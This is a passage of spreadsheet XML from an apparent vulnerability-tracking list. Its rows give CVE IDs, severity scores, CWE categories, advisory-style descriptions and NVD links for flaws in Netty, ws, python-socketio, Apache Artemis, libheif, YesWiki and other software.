      </c>
      <c r="E2628" s="5" t="inlineStr"/>
      <c r="F2628" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2628" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H2628" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I2628" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2628" s="5" t="inlineStr"/>
      <c r="K2628" s="5" t="inlineStr">
        <is>
          <t>CWE-1275</t>
        </is>
      </c>
      <c r="L2628" s="5" t="inlineStr">
        <is>
          <t>A WebFlux application running on the Jetty 12 Core reactive adapter serializes response cookies without the sameSite attribute.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19</t>
        </is>
      </c>
      <c r="M2628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47889</t>
        </is>
      </c>
    </row>
    <row r="2629">
      <c r="A2629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47895</t>
        </is>
      </c>
      <c r="C2629" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2629" s="5" t="inlineStr"/>
      <c r="F2629" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2629" s="5" t="inlineStr"/>
      <c r="H2629" s="5" t="inlineStr"/>
      <c r="I2629" s="5" t="inlineStr">
        <is>
          <t>2026-08-22</t>
        </is>
      </c>
      <c r="J2629" s="5" t="inlineStr"/>
      <c r="K2629" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2629" s="5" t="inlineStr">
        <is>
          <t>In strongSwan before 6.0.7, identity parsing/cloning is mishandled. Parsed EAP-Identities that result in an empty but non-NULL encoding are not correctly cloned and trigger a double-free once the duplicates are destroyed.</t>
        </is>
      </c>
      <c r="M2629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47895</t>
        </is>
      </c>
    </row>
    <row r="2630">
      <c r="A2630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48043</t>
        </is>
      </c>
      <c r="C2630" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2630" s="5" t="inlineStr"/>
      <c r="F2630" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2630" s="5" t="inlineStr"/>
      <c r="H2630" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2630" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2630" s="5" t="inlineStr"/>
      <c r="K2630" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="L2630" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-http2 prior to versions 4.1.135.Final and 4.2.15.Final, the `DelegatingDecompressorFrameListener` class orchestrates HTTP/2 decompression by embedding a per-stream `EmbeddedChannel` that runs the appropriate decompression codec (gzip, deflate, zstd) and forwards decompressed chunks to a wrapped listener. Each decompressed chunk is a pooled `ByteBuf` handed to an anonymous `ChannelInboundHandlerAdapter` tail handler, which becomes the sole owner responsible for releasing it. A remote peer could send frames that would result in the flow-controller throwing and so trigger a resource leak which at the end might take down the whole JVM due OOME. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48043</t>
        </is>
      </c>
    </row>
    <row r="2631">
      <c r="A2631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48486</t>
        </is>
      </c>
      <c r="C2631" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2631" s="5" t="inlineStr"/>
      <c r="F2631" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2631" s="5" t="inlineStr"/>
      <c r="H2631" s="5" t="inlineStr"/>
      <c r="I2631" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2631" s="5" t="inlineStr"/>
      <c r="K2631" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2631" s="5" t="inlineStr">
        <is>
          <t>Signum Node is a HDD-mined cryptocurrency using an energy efficient and fair Proof-of-Commitment (PoC+) consensus algorithm. Prior to version 3.9.9, an integer overflow in BlockServiceImpl.applyBlock() allowed a miner to receive an arbitrarily inflated block reward by crafting a block with a negative totalFeeCashBackNqt value. The vulnerability was introduced when the SMART_FEES hardfork (block ~1,029,000) enabled fee cash-back and burn accounting without overflow protection. This issue has been patched in version 3.9.9.</t>
        </is>
      </c>
      <c r="M2631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48486</t>
        </is>
      </c>
    </row>
    <row r="2632">
      <c r="A2632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48779</t>
        </is>
      </c>
      <c r="C2632" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2632" s="5" t="inlineStr"/>
      <c r="F2632" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2632" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2632" s="5" t="inlineStr">
        <is>
          <t>ws_project:ws</t>
        </is>
      </c>
      <c r="I2632" s="5" t="inlineStr">
        <is>
          <t>2026-06-17</t>
        </is>
      </c>
      <c r="J2632" s="5" t="inlineStr"/>
      <c r="K2632" s="5" t="inlineStr">
        <is>
          <t>CWE-1050, CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2632" s="5" t="inlineStr">
        <is>
          <t>ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.</t>
        </is>
      </c>
      <c r="M2632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48779</t>
        </is>
      </c>
    </row>
    <row r="2633">
      <c r="A2633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48804</t>
        </is>
      </c>
      <c r="C2633" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2633" s="5" t="inlineStr"/>
      <c r="F2633" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2633" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2633" s="5" t="inlineStr"/>
      <c r="I2633" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2633" s="5" t="inlineStr"/>
      <c r="K2633" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2633" s="5" t="inlineStr">
        <is>
          <t>python-socketio is a Python implementation of the Socket.IO realtime client and server. The python-socketio server stores binary `EVENT` and `ACK` messages in memory while it waits to receive their binary attachments. Once all the attachments are received, these messages are then processed. Prior to version 5.16.4, an attacker can submit a binary message and intentionally omit sending one or more of its attachments to cause the message along with the partial list of received attachments to stay in memory for a long time. Version 5.16.4 takes the following measures to address this issue: Binary packets are only accepted from authenticated clients and, when a client disconnects, the server checks if there is a partial binary message being held for the client and deletes it.</t>
        </is>
      </c>
      <c r="M2633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48804</t>
        </is>
      </c>
    </row>
    <row r="2634">
      <c r="A2634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48888</t>
        </is>
      </c>
      <c r="C2634" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2634" s="5" t="inlineStr"/>
      <c r="F2634" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2634" s="5" t="inlineStr"/>
      <c r="H2634" s="5" t="inlineStr"/>
      <c r="I2634" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2634" s="5" t="inlineStr"/>
      <c r="K2634" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2634" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.
This issue affects WooCommerce: from n/a before 11.1.0.</t>
        </is>
      </c>
      <c r="M2634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t>
        </is>
      </c>
    </row>
    <row r="2635">
      <c r="A2635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4926</t>
        </is>
      </c>
      <c r="C2635" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2635" s="5" t="inlineStr"/>
      <c r="F2635" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2635" s="5" t="inlineStr"/>
      <c r="H2635" s="5" t="inlineStr">
        <is>
          <t>pillarjs:path-to-regexp</t>
        </is>
      </c>
      <c r="I2635" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J2635" s="5" t="inlineStr"/>
      <c r="K2635" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L2635" s="5" t="inlineStr">
        <is>
          <t>Impact:
A bad regular expression is generated any time you have multiple sequential optional groups (curly brace syntax), such as `{a}{b}{c}:z`. The generated regex grows exponentially with the number of groups, causing denial of service.
Patches:
Fixed in version 8.4.0.
Workarounds:
Limit the number of sequential optional groups in route patterns. Avoid passing user-controlled input as route patterns.</t>
        </is>
      </c>
      <c r="M2635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4926</t>
        </is>
      </c>
    </row>
    <row r="2636">
      <c r="A2636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49362</t>
        </is>
      </c>
      <c r="C2636" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2636" s="5" t="inlineStr"/>
      <c r="F2636" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2636" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2636" s="5" t="inlineStr"/>
      <c r="I2636" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2636" s="5" t="inlineStr"/>
      <c r="K2636" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2636" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can create arbitrary durable queues via the CORE protocol, leading to unauthorized broker state manipulation and potential denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49362</t>
        </is>
      </c>
    </row>
    <row r="2637">
      <c r="A2637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49363</t>
        </is>
      </c>
      <c r="C2637" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2637" s="5" t="inlineStr"/>
      <c r="F2637" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2637" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2637" s="5" t="inlineStr"/>
      <c r="I2637" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2637" s="5" t="inlineStr"/>
      <c r="K2637" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2637" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker connecting with the CORE protocol can discover cluster node details by sending a SUBSCRIBE_TOPOLOGY request prior to authentication.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49363</t>
        </is>
      </c>
    </row>
    <row r="2638">
      <c r="A2638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50010</t>
        </is>
      </c>
      <c r="C2638" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2638" s="5" t="inlineStr"/>
      <c r="F2638" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2638" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H2638" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2638" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2638" s="5" t="inlineStr"/>
      <c r="K2638" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2638" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, SimpleTrustManagerFactory.engineGetTrustManagers() and related paths wrap any user-supplied plain X509TrustManager in X509TrustManagerWrapper, which extends X509ExtendedTrustManager but implements the 3-arg checkServerTrusted(chain, authType, SSLEngine) by discarding the SSLEngine and calling the 2-arg delegate. Because the object now IS an X509ExtendedTrustManager, neither SunJSSE's internal AbstractTrustManagerWrapper nor Netty's own OpenSslX509TrustManagerWrapper will re-wrap it to add endpoint-identification. Consequently, even though Netty 4.2 sets endpointIdentificationAlgorithm="HTTPS" by default, a client built with `SslContextBuilder.forClient().trustManager(somePlainX509TrustManager)` performs no hostname verification at all. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50010</t>
        </is>
      </c>
    </row>
    <row r="2639">
      <c r="A2639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50011</t>
        </is>
      </c>
      <c r="C2639" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2639" s="5" t="inlineStr"/>
      <c r="F2639" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2639" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2639" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2639" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2639" s="5" t="inlineStr"/>
      <c r="K2639" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2639" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, RedisArrayAggregator pre-allocates ArrayList with initial capacity equal to the RESP array element count declared in an array header. That count is taken from the wire before the corresponding child messages exist. A small malicious header can claim a huge initial capacity. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50011</t>
        </is>
      </c>
    </row>
    <row r="2640">
      <c r="A2640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50142</t>
        </is>
      </c>
      <c r="C2640" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2640" s="5" t="inlineStr"/>
      <c r="F2640" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2640" s="5" t="inlineStr"/>
      <c r="H2640" s="5" t="inlineStr"/>
      <c r="I2640" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2640" s="5" t="inlineStr"/>
      <c r="K2640" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-770</t>
        </is>
      </c>
      <c r="L2640" s="5" t="inlineStr">
        <is>
          <t>libheif is a HEIF and AVIF file format decoder and encoder. From 1.19.0 until 1.23.0, a crafted HEIF sequence accepted by heif_context_read_from_memory() with the msf1 sequence brand can cause unbounded heap allocation. In libheif/sequences/seq_boxes.cc, Box_stsz::parse() applies max_sequence_frames only to variable-size samples, so fixed-size mode accepts an attacker-controlled sample_count without a bound. In libheif/sequences/track.cc, Track::load() also adds current_sample_idx and samples_per_chunk in 32-bit arithmetic, allowing the consistency check to be bypassed by wraparound. The resulting values reach the Chunk::Chunk() allocation path, which can consume gigabytes of memory and crash or stall the process through memory exhaustion. This issue is fixed in version 1.23.0.</t>
        </is>
      </c>
      <c r="M2640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50142</t>
        </is>
      </c>
    </row>
    <row r="2641">
      <c r="A2641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50578</t>
        </is>
      </c>
      <c r="C2641" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2641" s="5" t="inlineStr"/>
      <c r="F2641" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2641" s="5" t="inlineStr"/>
      <c r="H2641" s="5" t="inlineStr"/>
      <c r="I2641" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2641" s="5" t="inlineStr"/>
      <c r="K2641" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2641" s="5" t="inlineStr">
        <is>
          <t>ePA 3.x Integration implements the authorization workflow and writes Medical Information Objects to Germany's electronic patient record. Prior to 1.3.0, ePA 3.x Integration disables TLS certificate verification for both ePA connections in app/vau/VAUProtokoll.py and Konnektor connections in app/konnektor/Konnektor.py. A network-positioned attacker can present an arbitrary certificate, terminate the TLS connection, and intercept ePA traffic. The VAU protocol does not provide an effective fallback because its application-layer certificate validation is also broken in affected versions. The Konnektor session uses self.session.verify set to False while the client authenticates with self.session.cert, so an attacker impersonating the Konnektor can receive the client's mutual TLS certificate exchange and observe smartcard operations. This issue is fixed in version 1.3.0.</t>
        </is>
      </c>
      <c r="M2641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50578</t>
        </is>
      </c>
    </row>
    <row r="2642">
      <c r="A2642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50776</t>
        </is>
      </c>
      <c r="C2642" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2642" s="5" t="inlineStr"/>
      <c r="F2642" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G2642" s="5" t="inlineStr"/>
      <c r="H2642" s="5" t="inlineStr"/>
      <c r="I2642" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2642" s="5" t="inlineStr"/>
      <c r="K2642" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2642" s="5" t="inlineStr">
        <is>
          <t>Directory Traversal vulnerability in Pronis Loisirs Billetterie CSE - &lt; 04/2026 allows a remote attacker to obtain sensitive information and execute arbitrary code.</t>
        </is>
      </c>
      <c r="M2642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50776</t>
        </is>
      </c>
    </row>
    <row r="2643">
      <c r="A2643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51367</t>
        </is>
      </c>
      <c r="C2643" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2643" s="5" t="inlineStr"/>
      <c r="F2643" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2643" s="5" t="inlineStr"/>
      <c r="H2643" s="5" t="inlineStr"/>
      <c r="I2643" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2643" s="5" t="inlineStr"/>
      <c r="K2643" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2643" s="5" t="inlineStr">
        <is>
          <t>An issue in Bottinelli Informatica Vedo Suite v.1.2.5 allows a remote attacker to obtain sensitive information via the api_vedo/chat endpoint and the utente_chat parameter</t>
        </is>
      </c>
      <c r="M2643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51367</t>
        </is>
      </c>
    </row>
    <row r="2644">
      <c r="A2644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52023</t>
        </is>
      </c>
      <c r="C2644" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2644" s="5" t="inlineStr"/>
      <c r="F2644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2644" s="5" t="inlineStr"/>
      <c r="H2644" s="5" t="inlineStr"/>
      <c r="I2644" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2644" s="5" t="inlineStr"/>
      <c r="K2644" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2644" s="5" t="inlineStr">
        <is>
          <t>An issue in kamailio v.6.1.1 and before allows a remote attacker to cause a denial of service via the ims_registrar_pcscf module, specifically the pcscf_save_pending/save_pending path and security-agreement parsing in sec_agree.c:parse_sec_agree()</t>
        </is>
      </c>
      <c r="M2644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52023</t>
        </is>
      </c>
    </row>
    <row r="2645">
      <c r="A2645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52481</t>
        </is>
      </c>
      <c r="C2645" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2645" s="5" t="inlineStr"/>
      <c r="F2645" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2645" s="5" t="inlineStr"/>
      <c r="H2645" s="5" t="inlineStr"/>
      <c r="I2645" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2645" s="5" t="inlineStr"/>
      <c r="K2645" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2645" s="5" t="inlineStr">
        <is>
          <t>An issue in SJRC F11 SJ-GPS-PRO firmware build 2019-09-17 allows a remote attacker to obtain sensitive information via the tcp_actions() function</t>
        </is>
      </c>
      <c r="M2645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52481</t>
        </is>
      </c>
    </row>
    <row r="2646">
      <c r="A2646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52770</t>
        </is>
      </c>
      <c r="C2646" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2646" s="5" t="inlineStr"/>
      <c r="F2646" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2646" s="5" t="inlineStr"/>
      <c r="H2646" s="5" t="inlineStr"/>
      <c r="I2646" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2646" s="5" t="inlineStr"/>
      <c r="K2646" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2646" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki’s public Bazar entry-listing APIs are vulnerable to unauthenticated SQL injection in numeric query / queries filters. For Bazar fields whose value structure is numeric, YesWiki escapes the attacker-controlled filter value but inserts it into SQL without quotes or numeric validation. An unauthenticated attacker can inject boolean SQL expressions and infer database contents from whether entries are returned. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M2646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52770</t>
        </is>
      </c>
    </row>
    <row r="2647">
      <c r="A2647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52829</t>
        </is>
      </c>
      <c r="C2647" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2647" s="5" t="inlineStr"/>
      <c r="F2647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2647" s="5" t="inlineStr"/>
      <c r="H2647" s="5" t="inlineStr"/>
      <c r="I2647" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2647" s="5" t="inlineStr"/>
      <c r="K2647" s="5" t="inlineStr">
        <is>
          <t>CWE-617, CWE-843</t>
        </is>
      </c>
      <c r="L2647" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, an unauthenticated IPv4 peer can deterministically terminate a synced Zebra node using the default Linux dual-stack listener configuration. The handshake path canonicalized an IPv4-mapped IPv6 PeerSocketAddr such as ::ffff:127.0.0.1 to plain IPv4 before storing it through MetaAddr::new_connected, but the mempool misbehavior path forwarded the raw transient address to MetaAddrChange::UpdateMisbehavior. In zebra-network/src/meta_addr.rs, apply_to_meta_addr then compared the canonical address-book entry with the raw update address and reached its unexpected address mismatch assertion. After the misbehavior batch flush, panic equals abort terminated zebrad; the peer only needed to complete a P2P handshake and advertise an invalid mempool transaction. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M2647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52829</t>
        </is>
      </c>
    </row>
    <row r="2648">
      <c r="A2648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52856</t>
        </is>
      </c>
      <c r="C2648" s="5" t="n">
        <v>7.5</v>
      </c>
